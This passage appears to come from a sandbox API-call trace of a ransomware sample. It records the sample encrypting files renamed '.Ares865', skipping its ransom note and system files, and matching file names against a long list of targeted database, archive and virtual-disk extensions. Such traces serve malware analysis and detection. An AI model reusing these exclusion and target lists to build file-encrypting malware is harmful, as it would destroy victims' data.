Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.843] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.843] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17248) returned 1 [0086.843] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.844] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.844] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.844] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.844] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.844] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.845] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4660, lpName=0x0) returned 0x15c [0086.847] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4660) returned 0x190000 [0086.853] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0086.853] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0086.853] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0086.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0086.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0086.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0086.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0086.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0086.854] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0086.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.854] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0086.854] CloseHandle (hObject=0x15c) returned 1 [0086.854] CloseHandle (hObject=0x118) returned 1 [0086.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.854] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.855] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf706700, ftCreationTime.dwHighDateTime=0x1cac81a, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbf706700, ftLastWriteTime.dwHighDateTime=0x1cac81a, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VISBRRES.DLL.trx_dll", cAlternateFileName="VISBRR~1.TRX")) returned 1 [0086.855] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.855] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.855] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".") returned 1 [0086.855] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="..") returned 1 [0086.855] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="windows") returned -1 [0086.855] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.855] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="temp") returned 1 [0086.855] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0086.858] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="boot") returned 1 [0086.858] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.858] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0086.858] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="perflogs") returned 1 [0086.858] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.858] lstrlenW (lpString="VISBRRES.DLL.trx_dll") returned 20 [0086.858] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll") returned 70 [0086.859] lstrcpyW (in: lpString1=0x2cce468, lpString2="VISBRRES.DLL.trx_dll" | out: lpString1="VISBRRES.DLL.trx_dll") returned="VISBRRES.DLL.trx_dll" [0086.859] lstrlenW (lpString="VISBRRES.DLL.trx_dll") returned 20 [0086.859] lstrlenW (lpString="Ares865") returned 7 [0086.859] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.859] lstrlenW (lpString=".dll") returned 4 [0086.859] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".dll") returned 1 [0086.859] lstrlenW (lpString=".lnk") returned 4 [0086.859] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.859] lstrlenW (lpString=".ini") returned 4 [0086.859] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".ini") returned 1 [0086.859] lstrlenW (lpString=".sys") returned 4 [0086.859] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2=".sys") returned 1 [0086.859] lstrlenW (lpString="VISBRRES.DLL.trx_dll") returned 20 [0086.859] lstrlenW (lpString="bak") returned 3 [0086.859] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.859] lstrlenW (lpString="ba_") returned 3 [0086.859] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.859] lstrlenW (lpString="dbb") returned 3 [0086.859] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.859] lstrlenW (lpString="vmdk") returned 4 [0086.859] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.859] lstrlenW (lpString="rar") returned 3 [0086.859] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.859] lstrlenW (lpString="zip") returned 3 [0086.859] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.859] lstrlenW (lpString="tgz") returned 3 [0086.859] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.859] lstrlenW (lpString="vbox") returned 4 [0086.859] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.859] lstrlenW (lpString="vdi") returned 3 [0086.859] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.859] lstrlenW (lpString="vhd") returned 3 [0086.859] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.859] lstrlenW (lpString="vhdx") returned 4 [0086.859] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.859] lstrlenW (lpString="avhd") returned 4 [0086.860] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.860] lstrlenW (lpString="db") returned 2 [0086.860] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.860] lstrlenW (lpString="db2") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.860] lstrlenW (lpString="db3") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.860] lstrlenW (lpString="dbf") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.860] lstrlenW (lpString="mdf") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.860] lstrlenW (lpString="mdb") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.860] lstrlenW (lpString="sql") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.860] lstrlenW (lpString="sqlite") returned 6 [0086.860] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.860] lstrlenW (lpString="sqlite3") returned 7 [0086.860] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.860] lstrlenW (lpString="sqlitedb") returned 8 [0086.860] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.860] lstrlenW (lpString="xml") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.860] lstrlenW (lpString="$er") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.860] lstrlenW (lpString="4dd") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.860] lstrlenW (lpString="4dl") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.860] lstrlenW (lpString="^^^") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.860] lstrlenW (lpString="abs") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.860] lstrlenW (lpString="abx") returned 3 [0086.860] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.860] lstrlenW (lpString="accdb") returned 5 [0086.861] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.861] lstrlenW (lpString="accdc") returned 5 [0086.861] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.861] lstrlenW (lpString="accde") returned 5 [0086.861] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.861] lstrlenW (lpString="accdr") returned 5 [0086.861] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.861] lstrlenW (lpString="accdt") returned 5 [0086.861] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.861] lstrlenW (lpString="accdw") returned 5 [0086.861] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.861] lstrlenW (lpString="accft") returned 5 [0086.861] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.861] lstrlenW (lpString="adb") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.861] lstrlenW (lpString="adb") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.861] lstrlenW (lpString="ade") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.861] lstrlenW (lpString="adf") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.861] lstrlenW (lpString="adn") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.861] lstrlenW (lpString="adp") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.861] lstrlenW (lpString="alf") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.861] lstrlenW (lpString="ask") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.861] lstrlenW (lpString="btr") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.861] lstrlenW (lpString="cat") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.861] lstrlenW (lpString="cdb") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.861] lstrlenW (lpString="ckp") returned 3 [0086.861] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.862] lstrlenW (lpString="cma") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.862] lstrlenW (lpString="cpd") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.862] lstrlenW (lpString="dacpac") returned 6 [0086.862] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.862] lstrlenW (lpString="dad") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.862] lstrlenW (lpString="dadiagrams") returned 10 [0086.862] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.862] lstrlenW (lpString="daschema") returned 8 [0086.862] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.862] lstrlenW (lpString="db-journal") returned 10 [0086.862] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.862] lstrlenW (lpString="db-shm") returned 6 [0086.862] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.862] lstrlenW (lpString="db-wal") returned 6 [0086.862] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.862] lstrlenW (lpString="dbc") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.862] lstrlenW (lpString="dbs") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.862] lstrlenW (lpString="dbt") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.862] lstrlenW (lpString="dbv") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.862] lstrlenW (lpString="dbx") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.862] lstrlenW (lpString="dcb") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.862] lstrlenW (lpString="dct") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.862] lstrlenW (lpString="dcx") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.862] lstrlenW (lpString="ddl") returned 3 [0086.862] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.863] lstrlenW (lpString="dlis") returned 4 [0086.863] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.863] lstrlenW (lpString="dp1") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.863] lstrlenW (lpString="dqy") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.863] lstrlenW (lpString="dsk") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.863] lstrlenW (lpString="dsn") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.863] lstrlenW (lpString="dtsx") returned 4 [0086.863] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.863] lstrlenW (lpString="dxl") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.863] lstrlenW (lpString="eco") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.863] lstrlenW (lpString="ecx") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.863] lstrlenW (lpString="edb") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.863] lstrlenW (lpString="epim") returned 4 [0086.863] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.863] lstrlenW (lpString="fcd") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.863] lstrlenW (lpString="fdb") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.863] lstrlenW (lpString="fic") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.863] lstrlenW (lpString="flexolibrary") returned 12 [0086.863] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.863] lstrlenW (lpString="fm5") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.863] lstrlenW (lpString="fmp") returned 3 [0086.863] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.863] lstrlenW (lpString="fmp12") returned 5 [0086.863] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.864] lstrlenW (lpString="fmpsl") returned 5 [0086.864] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.864] lstrlenW (lpString="fol") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.864] lstrlenW (lpString="fp3") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.864] lstrlenW (lpString="fp4") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.864] lstrlenW (lpString="fp5") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.864] lstrlenW (lpString="fp7") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.864] lstrlenW (lpString="fpt") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.864] lstrlenW (lpString="frm") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.864] lstrlenW (lpString="gdb") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.864] lstrlenW (lpString="gdb") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.864] lstrlenW (lpString="grdb") returned 4 [0086.864] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.864] lstrlenW (lpString="gwi") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.864] lstrlenW (lpString="hdb") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.864] lstrlenW (lpString="his") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.864] lstrlenW (lpString="ib") returned 2 [0086.864] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.864] lstrlenW (lpString="idb") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.864] lstrlenW (lpString="ihx") returned 3 [0086.864] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.864] lstrlenW (lpString="itdb") returned 4 [0086.864] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.864] lstrlenW (lpString="itw") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.865] lstrlenW (lpString="jet") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.865] lstrlenW (lpString="jtx") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.865] lstrlenW (lpString="kdb") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.865] lstrlenW (lpString="kexi") returned 4 [0086.865] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.865] lstrlenW (lpString="kexic") returned 5 [0086.865] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.865] lstrlenW (lpString="kexis") returned 5 [0086.865] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.865] lstrlenW (lpString="lgc") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.865] lstrlenW (lpString="lwx") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.865] lstrlenW (lpString="maf") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.865] lstrlenW (lpString="maq") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.865] lstrlenW (lpString="mar") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.865] lstrlenW (lpString="marshal") returned 7 [0086.865] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.865] lstrlenW (lpString="mas") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.865] lstrlenW (lpString="mav") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.865] lstrlenW (lpString="maw") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.865] lstrlenW (lpString="mdbhtml") returned 7 [0086.865] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.865] lstrlenW (lpString="mdn") returned 3 [0086.865] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.865] lstrlenW (lpString="mdt") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.866] lstrlenW (lpString="mfd") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.866] lstrlenW (lpString="mpd") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.866] lstrlenW (lpString="mrg") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.866] lstrlenW (lpString="mud") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.866] lstrlenW (lpString="mwb") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.866] lstrlenW (lpString="myd") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.866] lstrlenW (lpString="ndf") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.866] lstrlenW (lpString="nnt") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.866] lstrlenW (lpString="nrmlib") returned 6 [0086.866] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.866] lstrlenW (lpString="ns2") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.866] lstrlenW (lpString="ns3") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.866] lstrlenW (lpString="ns4") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.866] lstrlenW (lpString="nsf") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.866] lstrlenW (lpString="nv") returned 2 [0086.866] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.866] lstrlenW (lpString="nv2") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.866] lstrlenW (lpString="nwdb") returned 4 [0086.866] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.866] lstrlenW (lpString="nyf") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.866] lstrlenW (lpString="odb") returned 3 [0086.866] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.867] lstrlenW (lpString="odb") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.867] lstrlenW (lpString="oqy") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.867] lstrlenW (lpString="ora") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.867] lstrlenW (lpString="orx") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.867] lstrlenW (lpString="owc") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.867] lstrlenW (lpString="p96") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.867] lstrlenW (lpString="p97") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.867] lstrlenW (lpString="pan") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.867] lstrlenW (lpString="pdb") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.867] lstrlenW (lpString="pdm") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.867] lstrlenW (lpString="pnz") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.867] lstrlenW (lpString="qry") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.867] lstrlenW (lpString="qvd") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.867] lstrlenW (lpString="rbf") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.867] lstrlenW (lpString="rctd") returned 4 [0086.867] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.867] lstrlenW (lpString="rod") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.867] lstrlenW (lpString="rodx") returned 4 [0086.867] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.867] lstrlenW (lpString="rpd") returned 3 [0086.867] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.868] lstrlenW (lpString="rsd") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.868] lstrlenW (lpString="sas7bdat") returned 8 [0086.868] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.868] lstrlenW (lpString="sbf") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.868] lstrlenW (lpString="scx") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.868] lstrlenW (lpString="sdb") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.868] lstrlenW (lpString="sdc") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.868] lstrlenW (lpString="sdf") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.868] lstrlenW (lpString="sis") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.868] lstrlenW (lpString="spq") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.868] lstrlenW (lpString="te") returned 2 [0086.868] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.868] lstrlenW (lpString="teacher") returned 7 [0086.868] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.868] lstrlenW (lpString="tmd") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.868] lstrlenW (lpString="tps") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.868] lstrlenW (lpString="trc") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.868] lstrlenW (lpString="trc") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.868] lstrlenW (lpString="trm") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.868] lstrlenW (lpString="udb") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.868] lstrlenW (lpString="udl") returned 3 [0086.868] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.868] lstrlenW (lpString="usr") returned 3 [0086.869] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.869] lstrlenW (lpString="v12") returned 3 [0086.869] lstrcmpiW (lpString1="dll", lpString2="v12") 